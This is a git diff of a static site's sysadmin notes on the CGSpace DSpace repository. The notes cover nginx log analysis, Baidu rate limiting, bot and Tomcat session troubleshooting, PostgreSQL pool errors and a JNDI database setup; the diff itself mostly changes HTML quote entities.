@ -612,7 +612,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-
<li>The solution <a href="https://github.com/ilri/rmg-ansible-public/commit/f0646991772660c505bea9c5ac586490e7c86156">I came up with</a> uses tricks from both of those</li>
<li>I deployed the limit on CGSpace and DSpace Test and it seems to work well:</li>
</ul>
<pre tabindex="0"><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
<pre tabindex="0"><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -627,7 +627,7 @@ X-Cocoon-Version: 2.2.0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 503 Service Temporarily Unavailable
Connection: keep-alive
Content-Length: 206
@ -642,9 +642,9 @@ Server: nginx
<ul>
<li>At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 200 &quot;
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 200 &#34;
1132
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 503 &quot;
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 503 &#34;
10105
</code></pre><ul>
<li>Helping Sisay proof 47 records for IITA: <a href="https://dspacetest.cgiar.org/handle/10568/97029">https://dspacetest.cgiar.org/handle/10568/97029</a></li>
@ -695,7 +695,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>After a few minutes the connecitons went down to 44 and CGSpace was kinda back up, it seems like Tsega restarted Tomcat</li>
<li>Looking at the REST and XMLUI log files, I don&rsquo;t see anything too crazy:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
13 66.249.66.223
14 207.46.13.36
17 207.46.13.137
@ -706,7 +706,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
1400 70.32.83.92
1503 50.116.102.77
6037 45.5.184.196
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
325 139.162.247.24
354 66.249.66.223
422 207.46.13.36
@ -737,7 +737,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>Linode sent an alert that CGSpace was using a lot of CPU around 46 AM</li>
<li>Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;19/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;19/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
111 66.249.66.155
171 5.9.6.51
188 54.162.241.40
@ -751,7 +751,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>66.249.66.153 appears to be Googlebot:</li>
</ul>
<pre tabindex="0"><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &quot;GET /handle/10568/2203 HTTP/1.1&quot; 200 6309 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot;
<pre tabindex="0"><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &#34;GET /handle/10568/2203 HTTP/1.1&#34; 200 6309 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34;
</code></pre><ul>
<li>We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity</li>
<li>In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)</li>
@ -786,7 +786,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM</li>
<li>The logs don&rsquo;t show anything particularly abnormal between those hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;22/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;22/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
136 31.6.77.23
174 68.180.229.254
217 66.249.66.91
@ -807,7 +807,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM</li>
<li>I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
88 66.249.66.91
140 68.180.229.254
155 54.196.2.131
@ -821,7 +821,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
</code></pre><ul>
<li>&hellip; and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
5 190.120.6.219
6 104.198.9.108
14 104.196.152.243
@ -836,7 +836,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>These IPs crawling the REST API don&rsquo;t specify user agents and I&rsquo;d assume they are creating many Tomcat sessions</li>
<li>I would catch them in nginx to assign a &ldquo;bot&rdquo; user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they seem to create any reallyat least not in the dspace.log:</li>
</ul>
<pre tabindex="0"><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>I&rsquo;m wondering if REST works differently, or just doesn&rsquo;t log these sessions?</li>
@ -861,7 +861,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)</li>
<li>I also noticed that CGNET appears to be monitoring the old domain every few minutes:</li>
</ul>
<pre tabindex="0"><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &quot;HEAD / HTTP/1.1&quot; 301 0 &quot;-&quot; &quot;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&quot;
<pre tabindex="0"><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &#34;HEAD / HTTP/1.1&#34; 301 0 &#34;-&#34; &#34;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&#34;
</code></pre><ul>
<li>I should probably tell CGIAR people to have CGNET stop that</li>
</ul>
@ -870,7 +870,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM</li>
<li>Yet another mystery because the load for all domains looks fine at that time:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;26/Nov/2017:0[567]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;26/Nov/2017:0[567]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 66.249.66.83
195 104.196.152.243
220 40.77.167.82
@ -887,7 +887,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>About an hour later Uptime Robot said that the server was down</li>
<li>Here are all the top XMLUI and REST users from today:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;29/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;29/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
540 66.249.66.83
659 40.77.167.36
663 157.55.39.214
@ -905,14 +905,14 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>I don&rsquo;t see much activity in the logs but there are 87 PostgreSQL connections</li>
<li>But shit, there were 10,000 unique Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-29 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
10037
</code></pre><ul>
<li>Although maybe that&rsquo;s not much, as the previous two days had more:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-27 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
12377
$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ cat dspace.log.2017-11-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
16984
</code></pre><ul>
<li>I think we just need start increasing the number of allowed PostgreSQL connections instead of fighting this, as it&rsquo;s the most common source of crashes we have</li>

View File

@ -30,7 +30,7 @@ The logs say &ldquo;Timeout waiting for idle object&rdquo;
PostgreSQL activity says there are 115 connections currently
The list of connections to XMLUI and REST API for today:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -123,7 +123,7 @@ The list of connections to XMLUI and REST API for today:
<li>PostgreSQL activity says there are 115 connections currently</li>
<li>The list of connections to XMLUI and REST API for today:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
763 2.86.122.76
907 207.46.13.94
1018 157.55.39.206
@ -137,12 +137,12 @@ The list of connections to XMLUI and REST API for today:
</code></pre><ul>
<li>The number of DSpace sessions isn&rsquo;t even that high:</li>
</ul>
<pre tabindex="0"><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
5815
</code></pre><ul>
<li>Connections in the last two hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017:(09|10)&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017:(09|10)&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
78 93.160.60.22
101 40.77.167.122
113 66.249.66.70
@ -157,18 +157,18 @@ The list of connections to XMLUI and REST API for today:
<li>What the fuck is going on?</li>
<li>I&rsquo;ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
822
</code></pre><ul>
<li>Appears to be some new bot:</li>
</ul>
<pre tabindex="0"><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &quot;GET /handle/10568/78444?show=full HTTP/1.1&quot; 200 29307 &quot;-&quot; &quot;Mozilla/3.0 (compatible; Indy Library)&quot;
<pre tabindex="0"><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &#34;GET /handle/10568/78444?show=full HTTP/1.1&#34; 200 29307 &#34;-&#34; &#34;Mozilla/3.0 (compatible; Indy Library)&#34;
</code></pre><ul>
<li>I restarted Tomcat and everything came back up</li>
<li>I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the useragent in nginx</li>
<li>I will also add &lsquo;Drupal&rsquo; to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | grep Drupal | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
3 54.75.205.145
6 70.32.83.92
14 2a01:7e00::f03c:91ff:fe18:7396
@ -206,7 +206,7 @@ The list of connections to XMLUI and REST API for today:
<li>I don&rsquo;t see any errors in the DSpace logs but I see in nginx&rsquo;s access.log that UptimeRobot was returned with HTTP 499 status (Client Closed Request)</li>
<li>Looking at the REST API logs I see some new client IP I haven&rsquo;t noticed before:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;6/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;6/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
18 95.108.181.88
19 68.180.229.254
30 207.46.13.151
@ -228,7 +228,7 @@ The list of connections to XMLUI and REST API for today:
<li>I looked just now and see that there are 121 PostgreSQL connections!</li>
<li>The top users right now are:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;7/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;7/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
838 40.77.167.11
939 66.249.66.223
1149 66.249.66.206
@ -247,7 +247,7 @@ The list of connections to XMLUI and REST API for today:
</code></pre><ul>
<li>It is responsible for 4,500 Tomcat sessions today alone:</li>
</ul>
<pre tabindex="0"><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
4574
</code></pre><ul>
<li>I&rsquo;ve adjusted the nginx IP mapping that I set up last month to account for 124.17.34.60 and 124.17.34.59 using a regex, as it&rsquo;s the same bot on the same subnet</li>
@ -255,8 +255,8 @@ The list of connections to XMLUI and REST API for today:
</ul>
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(144666) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(144666) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is like I discovered in <a href="/cgspace-notes/2017-04">2017-04</a>, to set the <code>primary_bitstream_id</code> to null:</li>
</ul>
@ -294,12 +294,12 @@ UPDATE 1
</li>
<li>I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the <code>collection</code> field)</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
</code></pre><ul>
<li>It&rsquo;s the same on DSpace Test, I can&rsquo;t import the SAF bundle without specifying the collection:</li>
</ul>
<pre tabindex="0"><code>$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
No collections given. Assuming 'collections' file inside item directory
No collections given. Assuming &#39;collections&#39; file inside item directory
Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
Generating mapfile: /tmp/ccafs.map
Processing collections file: collections
@ -328,7 +328,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted that CGSpace was using high CPU from 4 to 6 PM</li>
<li>The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
671 66.249.66.70
885 95.108.181.88
904 157.55.39.96
@ -342,7 +342,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
33 68.180.229.254
48 157.55.39.96
51 157.55.39.179
@ -371,7 +371,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted this morning that there was high outbound traffic from 6 to 8 AM</li>
<li>The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 207.46.13.146
191 197.210.168.174
202 86.101.203.216
@ -385,7 +385,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
7 104.198.9.108
8 185.29.8.111
8 40.77.167.176
@ -402,7 +402,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM</li>
<li>The REST and OAI API logs look pretty much the same as earlier this morning, but there&rsquo;s a new IP harvesting XMLUI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
360 95.108.181.88
477 66.249.66.90
526 86.101.203.216
@ -420,13 +420,13 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:</li>
</ul>
<pre tabindex="0"><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>I guess there&rsquo;s nothing I can do to them for now</li>
<li>In other news, I am curious how many PostgreSQL connection pool errors we&rsquo;ve had in the last month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-1* | grep -v :0
<pre tabindex="0"><code>$ grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-1* | grep -v :0
dspace.log.2017-11-07:15695
dspace.log.2017-11-08:135
dspace.log.2017-11-17:1298
@ -476,7 +476,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>I re-deployed the <code>5_x-prod</code> branch on CGSpace, applied all system updates, and restarted the server</li>
<li>Looking through the dspace.log I see this error:</li>
</ul>
<pre tabindex="0"><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I don&rsquo;t have time now to look into this but the Solr sharding has long been an issue!</li>
<li>Looking into using JDBC / JNDI to provide a database pool to DSpace</li>
@ -484,23 +484,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>First, I uncomment <code>db.jndi</code> in <em>dspace/config/dspace.cfg</em></li>
<li>Then I create a global <code>Resource</code> in the main Tomcat <em>server.xml</em> (inside <code>GlobalNamingResources</code>):</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&quot;jdbc/dspace&quot; auth=&quot;Container&quot; type=&quot;javax.sql.DataSource&quot;
driverClassName=&quot;org.postgresql.Driver&quot;
url=&quot;jdbc:postgresql://localhost:5432/dspace&quot;
username=&quot;dspace&quot;
password=&quot;dspace&quot;
initialSize='5'
maxActive='50'
maxIdle='15'
minIdle='5'
maxWait='5000'
validationQuery='SELECT 1'
testOnBorrow='true' /&gt;
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspace&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspace&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;50&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>Most of the parameters are from comments by Mark Wood about his JNDI setup: <a href="https://jira.duraspace.org/browse/DS-3564">https://jira.duraspace.org/browse/DS-3564</a></li>
<li>Then I add a <code>ResourceLink</code> to each web application context:</li>
</ul>
<pre tabindex="0"><code>&lt;ResourceLink global=&quot;jdbc/dspace&quot; name=&quot;jdbc/dspace&quot; type=&quot;javax.sql.DataSource&quot;/&gt;
<pre tabindex="0"><code>&lt;ResourceLink global=&#34;jdbc/dspace&#34; name=&#34;jdbc/dspace&#34; type=&#34;javax.sql.DataSource&#34;/&gt;
</code></pre><ul>
<li>I am not sure why several guides show configuration snippets for <em>server.xml</em> and web application contexts that use a Local and Global jdbc&hellip;</li>
<li>When DSpace can&rsquo;t find the JNDI context (for whatever reason) you will see this in the dspace logs:</li>
@ -535,11 +535,11 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
